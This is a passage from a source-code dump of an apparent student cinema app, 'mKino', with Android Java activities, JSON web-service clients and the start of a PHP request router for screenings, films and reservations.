Integer.parseInt(tv.getText().toString());\r\n\t\t\t\t\r\n\t\t\t\t//prilikom kilika otvaraju se detalji o projekciji\r\n\t\t\t\tIntent i = new Intent(ProjekcijeActivity.this, DetaljiProjekcijeActivity.class);\r\n\t\t\t\ti.putExtra(\"idProjekcijeUBazi\", idProjekcijeUBazi);\r\n\t\t\t\tstartActivity(i);\r\n\t\t\t}\r\n\t\t});\r\n\t\t\r\n\t\t// dohvaćamo filmove i pohranjujemo ih u ListView \"popisFilmova\". Tu se automatski prikazuju na zaslon\r\n\t\tprojekcije = dohvatiProjekcije(odabraniMultipleks);\r\n\t\tSimpleDateFormat formatDatuma2 = new SimpleDateFormat(\"yyyy-MM-dd\");\r\n\t\tucitajProjekcijeUListView(formatDatuma2.format(sadasnjiDatum));\r\n\t\r\n\t}\r\n\t\t\r\n\t\r\n\t/**Postavlja spinner za izbor multipleksa na vrijednost trenutnog multipleksa u bazi.\r\n\t * Ukoliko on ne postoji ondje, odabire se prvi multipleks (indeks 0) koji je Zagreb\r\n\t */\r\n\tprivate int dohvatiOdabraniMultipleks() {\r\n\t\tfinal int ZAGREB = 1;\r\n\t\tint odabraniMultipleks = 1;//oma.dohvatiOdabraniMultipleks();\r\n\t\t\r\n\t\tif (odabraniMultipleks >= 1)\r\n\t\t\treturn odabraniMultipleks;\r\n\t\telse\r\n\t\t\treturn ZAGREB;\r\n\t}\r\n\t\r\n\t/**Dohvaća projekcije.\r\n\t * \r\n\t * Ova metoda pokreće dohvaćanje projekcije na dva načina. Prvo se dohvaćaju iz baze indeksi svih projekcija.\r\n\t * Potom se oblikuju u JSON i šalje se zahtjev web servisu. Servis vraća samo one projekcije \r\n\t * kojih nema u lokalnoj bazi, kao i one koje treba ukloniti iz lokalne baze.\r\n\t * Nakon toga se projekcije prikazuju na zaslon.\r\n\t * Ovaj princip je odabran kako bi se korisnicima uštedio podatkovni promet, odnosno,\r\n\t * kako se ne bi uvijek dohvaćali svi filmovi sa servisa\r\n\t * \r\n\t * @param id multipleksa\r\n\t * @return ažurirane projekcije\r\n\t */\r\n\tprivate List<ProjekcijaInfo> dohvatiProjekcije(int multipleks)\r\n\t{\t\r\n\t\tJsonProjekcije jf = new JsonProjekcije();\r\n\t\t\r\n\t\tList<ProjekcijaInfo> pinf = jf.dohvatiProjekcije(this, multipleks);\t\t\r\n\t\treturn pinf;\r\n\t}\r\n\r\n\r\n\t/** Dohvaća projekcije i učitava ih u ListView.\r\n\t * @params datum projekcija\r\n\t */\r\n\tprivate void ucitajProjekcijeUListView(String datum)\r\n\t{\r\n\t\tList<ProjekcijaInfo> danasnjeProjekcije = filtrirajProjekcijeZaDatum(datum);\r\n\t\tArrayAdapter<ProjekcijaInfo> adapter = new StavkaProjekcije(this, R.layout.stavka_projekcije, danasnjeProjekcije);\r\n\t\tListView lv = (ListView) findViewById(R.id.rezervacije_popis_projekcija);\r\n\t\tlv.setAdapter(adapter);\r\n\t}\r\n\t\r\n\t\r\n\t/**Filtiranje projekcija za odabrani datum.\r\n\t * Iz popisa svih projekcija filtrira samo današnje projekcije.\r\n\t * S ovim sprječavamo nova dohvaćanja projekcija kada se promijeni datum prikazivanja projekcija\r\n\t * @param odabrani datum\r\n\t * @return lista današnjih projekcija\r\n\t */\r\n\tprivate List<ProjekcijaInfo> filtrirajProjekcijeZaDatum(String datum) {\r\n\t\tList<ProjekcijaInfo> danasnjeProjekcije = new ArrayList<ProjekcijaInfo>();\r\n\t\t\r\n\t\t//prolazimo kroz sve projekcije i provjeravamo dan, mjesec i godinu početka\r\n\t\tfor(ProjekcijaInfo projekcija : projekcije)\r\n\t\t{\r\n\t\t\tif (datum.equals(projekcija.getVrijemePocetka().substring(0, 10)))\r\n\t\t\t{\r\n\t\t\t\tdanasnjeProjekcije.add(projekcija);\r\n\t\t\t}\r\n\t\t}\r\n\t\t\r\n\t\treturn danasnjeProjekcije;\r\n\t}\r\n\t/**\r\n\t * Metoda koja vraća dan u tjednu.\r\n\t * @param datum\r\n\t * @return string dan u tjednu\r\n\t */\r\n\t public String vratiDanUTjednu(Date datum)\r\n\t { \r\n\t\t String danOriginal;\r\n\t\t SimpleDateFormat formatDana = new SimpleDateFormat(\"E\");\r\n\r\n\t\t //dohvaćame dane u tjednu iz resursa\r\n\t\t String[] daniUTjednu = getResources().getStringArray(R.array.dani_u_tjednu);\r\n\t\t \r\n\t\t danOriginal = formatDana.format(datum);\r\n\t\t \r\n\t\t if(danOriginal.compareTo(\"Mon\") == 0 ) return daniUTjednu[0];\r\n\t\t else if(danOriginal.compareTo(\"Tue\") == 0 ) return daniUTjednu[1];\r\n\t\t else if(danOriginal.compareTo(\"Wed\") == 0 ) return daniUTjednu[2];\r\n\t\t else if(danOriginal.compareTo(\"Thu\") == 0 ) return daniUTjednu[3];\r\n\t\t else if(danOriginal.compareTo(\"Fri\") == 0 ) return daniUTjednu[4];\r\n\t\t else if(danOriginal.compareTo(\"Sat\") == 0 ) return daniUTjednu[5];\r\n\t\t else if(danOriginal.compareTo(\"Sun\") == 0 ) return daniUTjednu[6];\r\n\t\t else return danOriginal.toString();\r\n\t\t\r\n\t }\r\n}\r\n" }, { "alpha_fraction": 0.8300395011901855, "alphanum_fraction": 0.8300395011901855, "avg_line_length": 49.599998474121094, "blob_id": "9a90d3235ec82a2266b05825d08118ae9667c15a", "content_id": "183d9b598de4f159fa53ba4b22f6a8ee743a5cc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 258, "license_type": "no_license", "max_line_length": 114, "num_lines": 5, "path": "/README.md", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "#Klijentska strana\nMapa client-side predstavlja mobilnu aplikaciju koja će se izvršavati na Android uređaju (klijentu)\n\n#Serverska strana\nMapa server-side predstavlja skup PHP skripti, bazu podataka i ostale materijale, koji će se izrvšavati na serveru\n" }, { "alpha_fraction": 0.72089684009552, "alphanum_fraction": 0.7221524715423584, "avg_line_length": 30.9881649017334, "blob_id": "3b3712789a7028a72122227d15d1b1ac1a212e92", "content_id": "a53b6de6a4782b1a38bc99441569e32c159e7cbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5595, "license_type": "no_license", "max_line_length": 219, "num_lines": 169, "path": "/client-side/src/hr/air/mkino/server/JsonProjekcije.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport hr.air.mkino.baza.FilmoviAdapter;\r\n\r\nimport hr.air.mkino.baza.ProjekcijeAdapter;\r\nimport hr.air.mkino.tipovi.FilmInfo;\r\nimport hr.air.mkino.tipovi.ProjekcijaInfo;\r\n\r\nimport java.io.IOException;\r\nimport java.io.UnsupportedEncodingException;\r\nimport java.util.ArrayList;\r\n\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\nimport org.apache.http.NameValuePair;\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\nimport org.apache.http.client.entity.UrlEncodedFormEntity;\r\nimport org.apache.http.client.methods.HttpPost;\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\nimport org.apache.http.message.BasicNameValuePair;\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\nimport android.content.Context;\r\nimport android.os.AsyncTask;\r\n\r\n/**\r\n * Klasa koja služi z aasinkrono dohvaćanje projekcija sa web servisa.\r\n * @author bstivic\r\n *\r\n */\r\npublic class JsonProjekcije extends AsyncTask <String, Void, String> {\r\n\r\nProjekcijeAdapter bazaProjekcija;\r\n\t\r\n\t/**\r\n\t * Dohvaća projekcije sa web servisa. To ne uključuje one projekcije koji se već nalaze u lokalnoj bazi\r\n\t * @return projekcije u Jsonformatu\r\n\t */\r\n\tpublic List<ProjekcijaInfo> dohvatiProjekcije(Context c, int multipleks)\r\n\t{\r\n\t\t// najprije dohvaćamo id-eve projekcija iz lokalne baze podataka, kako bi znali koje projekcije ne trebamo dohvaćati sa webservisa\r\n\t\tbazaProjekcija = new ProjekcijeAdapter(c);\r\n\t\tList<Integer> idProjekcija = bazaProjekcija.dohvatiIdProjekcija();\r\n\t\t\r\n\t\t// pretvaramo listu s id-evima projekcija u JSON string \r\n\t\tStringBuilder sb = new StringBuilder();\r\n\t\tsb.append(\"[\");\r\n\t\tfor(int i=0; i<idProjekcija.size(); i++)\r\n\t\t{\r\n\t\t\tsb.append(\"{\\\"idProjekcije\\\":\\\"\" + idProjekcija.get(i) + \"\\\"}\");\r\n\t\t\t// ako se ne radi o posljednjem elementu, dodat ćemo zarez\r\n\t\t\tif (i != idProjekcija.size() - 1)\r\n\t\t\t{\r\n\t\t\t\tsb.append(\",\");\r\n\t\t\t}\r\n\t\t}\r\n\t\tsb.append(\"]\");\r\n\t\t// finalni JSON string koji ćemo slati web servisu putem HTTP-POST metode\r\n\t\tString jsonString = sb.toString();\r\n\t\t\r\n\t\tString mult = Integer.toString(multipleks);\r\n\t\tthis.execute(jsonString,mult);\r\n\t\tString jsonRezultat = \"\";\r\n\t\ttry {\r\n\t\t\tjsonRezultat = this.get();\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\r\n\r\n\t\t\tList<ProjekcijaInfo> projekcije = parsirajJson(jsonRezultat, c, multipleks);\r\n\t\t\treturn projekcije;\r\n\t\t\r\n\t}\r\n\t\r\n\t/**\r\n\t * Parsira JSON string dohvaćen s web servisa \r\n\t * @param jsonRezultat\r\n\t * @return projekcije\r\n\t */\r\n\tprivate List<ProjekcijaInfo> parsirajJson(String jsonRezultat, Context c, int multipleksOdabrani) {\r\n\t\tList<ProjekcijaInfo> projekcije\t= new ArrayList<ProjekcijaInfo>();\r\n\t\tFilmoviAdapter filmAd = new FilmoviAdapter(c);\r\n\t\tint film;\r\n\t\tint dvorana;\r\n\t\tString vrijemePocetka;\r\n\t\tfloat cijena;\t\t\r\n\t\tint multipleks;\t\r\n\t\tint idProjekcije;\r\n\t\t\r\n\t\ttry {\r\n\t\t\tJSONArray projekcijeJson = new JSONArray(jsonRezultat);\r\n\t\t\tint n = projekcijeJson.length();\r\n\t\t\tfor(int i=0; i<n; i++)\r\n\t\t\t{\r\n\t\t\t\tJSONObject projekcijaJson = projekcijeJson.getJSONObject(i);\r\n\t\t\t\tfilm = projekcijaJson.getInt(\"film\");\r\n\t\t\t\tdvorana = projekcijaJson.getInt(\"brojDvorane\");\r\n\t\t\t\tvrijemePocetka = projekcijaJson.getString(\"vrijemePocetka\");\r\n\t\t\t\tcijena = (float)projekcijaJson.getDouble(\"cijena\");\r\n\t\t\t\tidProjekcije = projekcijaJson.getInt(\"idProjekcije\");\r\n\t\t\t\tmultipleks = projekcijaJson.getInt(\"multipleks\");\r\n\t\t\t\tFilmInfo filmInf = filmAd.dohvatiDetaljeFilma(film);\t\r\n\r\n\t\t\t\tProjekcijaInfo projekcija = new ProjekcijaInfo(idProjekcije, dvorana, filmInf,vrijemePocetka, multipleks, cijena); \t\r\n\t\t\t\t\r\n\t\t\t\tprojekcije.add(projekcija);\r\n\t\t\t}\r\n\t\t}\r\n\t\tcatch (JSONException e) {\r\n\t\t\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\r\n\t\t\r\n\t bazaProjekcija.azurirajBazuProjekcija(projekcije);\r\n\r\n\t\t// nakon ažuriranja baze, dohvaćamo ponovno sve filmove iz baze\r\n\t\tprojekcije = bazaProjekcija.dohvatiProjekcije(multipleksOdabrani, c);\r\n\t\t\r\n\t\treturn projekcije;\r\n\t}\r\n\t\r\n\t// pomoćna metoda koja u pozadini obrađuje http zahtjev (dohvaćanje podataka)\r\n\t@Override\r\n\tprotected String doInBackground(String... parametri) {\r\n\t\tString jsonString = parametri[0];\r\n\t\tString multipleks = parametri[1];\r\n\t\r\n\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t\t// HTTP-POST metodom ćemo poslati JSON string. U tom JSON stringu se nalaze indeksi svih projekcija koji se nalaze u lokalnoj bazi. Web servis će vratiti sve one projekcije čiji se indeksi ne nalaze u tom JSON stringu\r\n\t\tHttpPost httpPost = new HttpPost(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=projekcijeMultipleks&multipleks=\"+multipleks);\r\n\t\t\r\n\t\t// dodajemo JSON string u \"httpPost\" objekt\r\n\t\ttry {\r\n\t\t\tList<NameValuePair> podaci = new ArrayList<NameValuePair>();\r\n\t\t\tpodaci.add(new BasicNameValuePair(\"bezOvihProjekcija\", jsonString));\r\n\t\t\thttpPost.setEntity(new UrlEncodedFormEntity(podaci));\r\n\t\t} catch (UnsupportedEncodingException e1) {\r\n\t\t\te1.printStackTrace();\r\n\t\t}\r\n\r\n\t\tString jsonRezultat = \"\";\r\n\t\tResponseHandler<String> handler = new BasicResponseHandler();\r\n\t\t\r\n\t\t// ono što dohvatimo u jsonRezultat će biti odgovor servera (web servisa)\r\n\t\ttry {\r\n\t\t\tjsonRezultat = httpKlijent.execute(httpPost, handler);\r\n\t\t}\r\n\t\tcatch(ClientProtocolException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\tcatch(IOException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\treturn jsonRezultat;\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7113272547721863, "alphanum_fraction": 0.7138374447822571, "avg_line_length": 26.45535659790039, "blob_id": "359f10c83ef0183b231600f111cf3df6ac248b7a", "content_id": "70240173da1b06e9dd19336ee9199fe2438c5911", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3190, "license_type": "no_license", "max_line_length": 114, "num_lines": 112, "path": "/client-side/src/hr/air/mkino/server/JsonObrisiRegistraciju.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport java.io.IOException;\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\nimport org.apache.http.NameValuePair;\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\nimport org.apache.http.client.entity.UrlEncodedFormEntity;\r\nimport org.apache.http.client.methods.HttpPost;\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\nimport org.apache.http.message.BasicNameValuePair;\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\n\r\nimport android.content.Context;\r\nimport android.os.AsyncTask;\r\n/**\r\n * Klasa koja služi za brisanje rezervacije na udaljenoj bazi podataka.\r\n * @author bstivic\r\n *\r\n */\r\npublic class JsonObrisiRegistraciju extends AsyncTask<String, Void, String> {\r\n\t\r\n\t/**\r\n\t * Metoda koja služi za brisanje rezervacije.\r\n\t * komunicira sa web servisom\r\n\t * @param korisnickoIme\r\n\t * @param idProjekcije\r\n\t * @param context\r\n\t * @return uspjesnost 0-uspjesno, - neuspjesno\r\n\t */\r\n\tpublic int dohvati(String korisnickoIme, String idProjekcije, Context c)\r\n\t{\t\t\t\t\t\r\n\t\tthis.execute(korisnickoIme, idProjekcije);\r\n\t\tString jsonRezultat = \"\";\r\n\t\ttry {\r\n\t\t\tjsonRezultat = this.get();\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\t\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\t\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\treturn parsirajJson(jsonRezultat);\t\t\t\r\n\t}\r\n\r\n/**\r\n * Metoda koja parsira rezultat web servisa.\r\n * @param jsonRezultat\r\n * @return 0 uspjesno, <0 neuspjesno\r\n */\r\n\tprivate int parsirajJson(String jsonRezultat) {\t\t\r\n\t\tint povratnaInformacijaId = 7;\r\n\t\t\r\n\t\ttry {\r\n\t\t\tJSONArray rezultati = new JSONArray(jsonRezultat);\r\n\t\t\tint n = rezultati.length();\r\n\t\t\t\r\n\t\t\t\tfor(int i=0; i<n; i++)\r\n\t\t\t\t{\r\n\t\t\t\tJSONObject rezultat = rezultati.getJSONObject(i);\t\t\t\t\r\n\t\t\t\tpovratnaInformacijaId = rezultat.getInt(\"povratnaInformacijaId\");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\r\n\t\tcatch (JSONException e) {\r\n\t\t\te.printStackTrace();\r\n\t\t\treturn -7;\r\n\t\t}\r\n\t\t\r\n\t\treturn povratnaInformacijaId;\r\n\t}\r\n\t\r\n\t/**\r\n\t * Metoda koja služi za asinkronu komunikaciju sa web servisom.\r\n\t */\r\n\tprotected String doInBackground(String... podaciPrijava) {\r\n\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t \r\n\t\tHttpPost httpPostZahtjev = new HttpPost(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=obrisirezervaciju\");\r\n\t\tString jsonResult = \"\";\r\n\t\tResponseHandler<String> handler = new BasicResponseHandler();\t\t\t\r\n\t\tList<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>();\r\n\t\tnameValuePairs.add(new BasicNameValuePair(\"korisnickoime\", podaciPrijava[0]));\r\n\t\tnameValuePairs.add(new BasicNameValuePair(\"projekcija\", podaciPrijava[1]));\r\n\r\n\t\ttry {\r\n\t\t\t httpPostZahtjev.setEntity(new UrlEncodedFormEntity(nameValuePairs));\r\n\t\t\t jsonResult = httpKlijent.execute(httpPostZahtjev, handler);\r\n\t\t}\r\n\t\tcatch(ClientProtocolException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\tcatch(IOException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\treturn jsonResult;\r\n\t}\r\n\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7414926290512085, "alphanum_fraction": 0.7454359531402588, "avg_line_length": 34.036842346191406, "blob_id": "0bb34997366c29875ff5e8b2a614f383ad8ac950", "content_id": "e2bce0726a600387f9e09973304285bc11d108e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 6875, "license_type": "no_license", "max_line_length": 173, "num_lines": 190, "path": "/client-side/src/hr/air/mkino/MojaMapaActivity.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino;\r\n\r\nimport java.util.List;\r\n\r\nimport com.google.android.gms.maps.CameraUpdate;\r\nimport com.google.android.gms.maps.CameraUpdateFactory;\r\nimport com.google.android.gms.maps.GoogleMap;\r\nimport com.google.android.gms.maps.SupportMapFragment;\r\nimport com.google.android.gms.maps.model.BitmapDescriptorFactory;\r\nimport com.google.android.gms.maps.model.CameraPosition;\r\nimport com.google.android.gms.maps.model.LatLng;\r\nimport com.google.android.gms.maps.model.MarkerOptions;\r\n\r\nimport hr.air.mkino.R;\r\nimport hr.air.mkino.baza.MultipleksAdapter;\r\nimport hr.air.mkino.baza.OdabraniMultipleksAdapter;\r\nimport hr.air.mkino.lokacija.PratiteljLokacije;\r\nimport hr.air.mkino.server.JsonMultipleksi;\r\nimport hr.air.mkino.tipovi.MultipleksInfo;\r\nimport android.os.Bundle;\r\nimport android.support.v4.app.FragmentActivity;\r\nimport android.view.Menu;\r\nimport android.view.MenuItem;\r\nimport android.view.View;\r\nimport android.widget.AdapterView;\r\nimport android.widget.AdapterView.OnItemSelectedListener;\r\nimport android.widget.Spinner;\r\n\r\n/**\r\n * Ova klasa služi za prikaz multipleksa i odabir istog. \r\n * Odabrani multipleks će se pohraniti u lokalnoj bazi i biti će korišten svaki puta kada to bude bilo potrebno u aplikaciji\r\n * @author domagoj\r\n */\r\npublic class MojaMapaActivity extends FragmentActivity {\r\n\tprivate GoogleMap mapa;\r\n\tprivate Spinner spinner;\r\n\tprivate List<MultipleksInfo> multipleksi;\r\n\tprivate OdabraniMultipleksAdapter odabraniMultipleks;\r\n\t\r\n\t@Override\r\n\tprotected void onCreate(Bundle savedInstanceState) {\r\n\t\tsuper.onCreate(savedInstanceState);\r\n\t\tsetContentView(R.layout.activity_moja_mapa);\r\n\t\tsetTitle(\"Prikaz multipleksa\");\r\n\t\t\r\n\t\tmapa = ((SupportMapFragment) getSupportFragmentManager().findFragmentById(R.id.map_fragment)).getMap();\r\n\t\tspinner = (Spinner) findViewById(R.id.odabir_multipleksa);\r\n\t\tmultipleksi = dohvatiMultiplekse();\r\n\t\t\r\n\t\todabraniMultipleks = new OdabraniMultipleksAdapter(this);\r\n\t\t// postavljamo spinner na vrijednost iz baze podataka\r\n\t\tpostaviSpinner(odabraniMultipleks);\r\n\t\t\r\n\t\t// omogućujemo da se svaka promjena spinnera prikaže na karti i također odmah prikazujemo multiplekse na karti\r\n\t\tspinner.setOnItemSelectedListener(new OnItemSelectedListener() {\r\n\t\t\t@Override\r\n\t\t\tpublic void onItemSelected(AdapterView<?> arg0, View arg1, int arg2, long idOdabranogMultipleksa) {\r\n\t\t\t\tprikaziMultipleksaNaKarti(multipleksi);\r\n\t\t\t\t\r\n\t\t\t\t// pohranjujemo vrijednost spinnera u bazu podataka\r\n\t\t\t\todabraniMultipleks.pohraniOdabraniMultipleks((int)idOdabranogMultipleksa);\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\t@Override\r\n\t\t\tpublic void onNothingSelected(AdapterView<?> arg0) {}\r\n\t\t});\r\n\t\t\r\n\t\t\r\n\t}\r\n\r\n\t@Override\r\n\tpublic boolean onCreateOptionsMenu(Menu menu) {\r\n\t\t// Inflate the menu; this adds items to the action bar if it is present.\r\n\t\tgetMenuInflater().inflate(R.menu.moja_mapa_activity, menu);\r\n\t\treturn true;\r\n\t}\r\n\t@Override\r\n\tpublic boolean onOptionsItemSelected(MenuItem item) {\r\n\t\tswitch (item.getItemId()) {\r\n\t\tcase R.id.geolokacija:\r\n\t\t\t\t// brišemo postojeći multipleks iz baze i postavljamo novi (koji će biti dobiven geolokacijom)\r\n\t\t\t\todabraniMultipleks.obrisiMultiplekseIzBaze();\r\n\t\t\t\tpostaviSpinner(odabraniMultipleks);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\treturn super.onOptionsItemSelected(item);\r\n\t}\r\n\t\r\n\t/**\r\n\t * Dohvaća multiplekse. \r\n\t * Ukoliko postoje u lokalnoj bazi, dohvaća ih iz nje, a ukoliko ne, dohvaća ih sa servisa. To je učinjeno u svrhu štednje podatkovnog prometa\r\n\t * @return lista s dohvaćenim multipleksima\r\n\t */\r\n\tprivate List<MultipleksInfo> dohvatiMultiplekse() {\r\n\t\tMultipleksAdapter multipleksAdapter = new MultipleksAdapter(this);\r\n\t\tList<MultipleksInfo> multipleksi = multipleksAdapter.dohvatiMultiplekse();\r\n\t\t\r\n\t\tif (multipleksi.size() == 0)\r\n\t\t{\r\n\t\t\tJsonMultipleksi jsonMultipleksi = new JsonMultipleksi();\r\n\t\t\tmultipleksi = jsonMultipleksi.dohvatiMultiplekse();\r\n\t\t\t\r\n\t\t\t// unos dohvaćenih multipleksa u lokalnu bazu\r\n\t\t\tfor (MultipleksInfo multipleks : multipleksi)\r\n\t\t\t{\r\n\t\t\t\tmultipleksAdapter.unosMultipleksa(multipleks);\r\n\t\t\t}\r\n\t\t} \r\n\t\t\r\n\t\treturn multipleksi;\r\n\t}\r\n\t\r\n\t/**\r\n\t * Prikazuje multiplekse na karti (prije toga čisti kartu od svih postavljenih multipleksa)\r\n\t * @param multipleksi\r\n\t */\r\n\tprivate void prikaziMultipleksaNaKarti(List<MultipleksInfo> multipleksi) {\r\n\t\tlong idMultipleksaSpinner = spinner.getSelectedItemId();\r\n\t\t\r\n\t\tmapa.clear();\r\n\t\tfor (MultipleksInfo multipleks : multipleksi)\r\n\t\t{\r\n\t\t\tMarkerOptions marker = new MarkerOptions();\r\n\t\t\tmarker.title(multipleks.getNaziv());\r\n\t\t\tmarker.position(new LatLng(multipleks.getZemljopisnaSirina(), multipleks.getZemljopisnaDuzina()));\r\n\t\t\t\r\n\t\t\tif (multipleks.getIdMultipleksa() == idMultipleksaSpinner + 1)\r\n\t\t\t{\r\n\t\t\t\tmarker.icon(BitmapDescriptorFactory.fromResource(R.drawable.kino_selektirano));\r\n\t\t\t\t\r\n\t\t\t\tfloat lat = multipleks.getZemljopisnaSirina();\r\n\t\t\t\tfloat lng = multipleks.getZemljopisnaDuzina();\r\n\t\t\t\tCameraPosition cp = new CameraPosition(new LatLng(lat, lng), 6, 0, 0);\r\n\t\t\t\tCameraUpdate cu = CameraUpdateFactory.newCameraPosition(cp);\r\n\t\t\t\tmapa.animateCamera(cu);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tmarker.icon(BitmapDescriptorFactory.fromResource(R.drawable.kino));\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\tmapa.addMarker(marker);\r\n\t\t}\r\n\t}\r\n\t\r\n\t/**\r\n\t * Postavlja početnu vrijednost na spinner za odabir lokacije. Ukoliko taj podatak ne postoji u bazi, postavljamo spinner na index 0 (grad Zagreb)\r\n\t * @param odabraniMultipleks koji će biti postavljen na spinner\r\n\t */\r\n\tprivate void postaviSpinner(OdabraniMultipleksAdapter odabraniMultipleks) {\r\n\t\tint trenutnaVrijednost = odabraniMultipleks.dohvatiOdabraniMultipleks();\r\n\t\t\r\n\t\tif (trenutnaVrijednost == -1)\r\n\t\t\tspinner.setSelection(indeksNajblizegMultipleksa());\r\n\t\telse\r\n\t\t\tspinner.setSelection(trenutnaVrijednost);\r\n\t}\r\n\r\n\t/**\r\n\t * Ova metoda vraća indeks najbližeg multipleksa kako bi se on mogao koristiti u spinner-u. Pod pojmom \"najbliži\" se misli prostorno najbliži od trenutne lokacije korisnika\r\n\t * @return indeks najbližeg multipleksa\r\n\t */\r\n\tprivate int indeksNajblizegMultipleksa() {\r\n\t\tPratiteljLokacije pratitelj = new PratiteljLokacije(this);\r\n\t\t\r\n\t\tif (pratitelj.lokacijaDostupna())\r\n\t\t{\r\n\t\t\tint indeksNajblizegMultipleksa = 0;\r\n\t\t\tfloat udaljenostDoNajblizegMultipleksa = 999999999; // za početnu udaljenost stavimo neki jako veliki broj (jer se traži najmanja udaljenost)\r\n\t\t\t\r\n\t\t\tfor (MultipleksInfo multipleks : multipleksi)\r\n\t\t\t{\r\n\t\t\t\tfloat tmpUdaljenost = pratitelj.udaljenostDo(multipleks.getZemljopisnaDuzina(), multipleks.getZemljopisnaSirina());\r\n\t\t\t\tif (tmpUdaljenost < udaljenostDoNajblizegMultipleksa)\r\n\t\t\t\t{\r\n\t\t\t\t\tudaljenostDoNajblizegMultipleksa = tmpUdaljenost;\r\n\t\t\t\t\tindeksNajblizegMultipleksa = multipleks.getIdMultipleksa();\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn indeksNajblizegMultipleksa - 1; // oduzimamo 1 jer u bazi podaci počinju od 1, a nama za spinner trebaju podaci od 0\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\treturn 0;\r\n\t\t}\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.5790421962738037, "alphanum_fraction": 0.603501558303833, "avg_line_length": 44.42629623413086, "blob_id": "ab59516d14d09b543d7e51d5935a11f6a01de672", "content_id": "28cc7af3ae32cd67fa936596163697445ff73d98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 11659, "license_type": "no_license", "max_line_length": 96, "num_lines": 251, "path": "/server-side/Datoteke/skripte/index.php", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "<?php\r\n // filmovi\r\n if ($_GET['tip'] == 'filmovi')\r\n {\r\n require_once 'filmovi.php';\r\n $filmovi = Filmovi::DohvatiFilmove($_GET['aktualno']);\r\n echo json_encode($filmovi);\r\n } \r\n else if($_GET['tip'] == 'mr')\r\n {\r\n \r\n require_once 'filmovi.php'; \r\n $korisnik = $_GET['korisnik'];\r\n $uspjesno = Filmovi::DohvatiRezervacije($korisnik);\r\n echo json_encode($uspjesno);\r\n }\r\n else if ($_GET['tip'] == 'nekifilmovi')\r\n {\r\n require_once 'filmovi.php';\r\n $bezOvihFilmova = $_POST['bezOvihFilmova'];\r\n $filmovi = Filmovi::DohvatiNekeFilmove($_GET['aktualno'], $bezOvihFilmova);\r\n echo json_encode($filmovi);\r\n }\r\n \r\n // sve projekcije \r\n else if ($_GET['tip'] == 'projekcije')\r\n {\r\n require_once 'filmovi.php';\r\n $projekcije = Filmovi::DohvatiSveProjekcije($_GET['film'], $_GET['multipleks']);\r\n echo json_encode($projekcije);\r\n }\r\n \r\n // projekcije na današnji dan\r\n else if ($_GET['tip'] == 'projekcijeDanas')\r\n {\r\n require_once 'filmovi.php';\r\n $datum = date('Y-m-d');\r\n $projekcije = Filmovi::DohvatiProjekcijeNaDan($_GET['film'], $_GET['multipleks'], $datum);\r\n echo json_encode($projekcije);\r\n }\r\n \r\n // sve projekcije za multipleks\r\n else if ($_GET['tip'] == 'projekcijeMultipleks')\r\n {\r\n require_once 'filmovi.php';\r\n $bezOvihProjekcija = $_POST['bezOvihProjekcija'];\r\n $projekcije = Filmovi::DohvatiProjekcijeMultipleks($_GET['multipleks'], $bezOvihProjekcija);\r\n echo 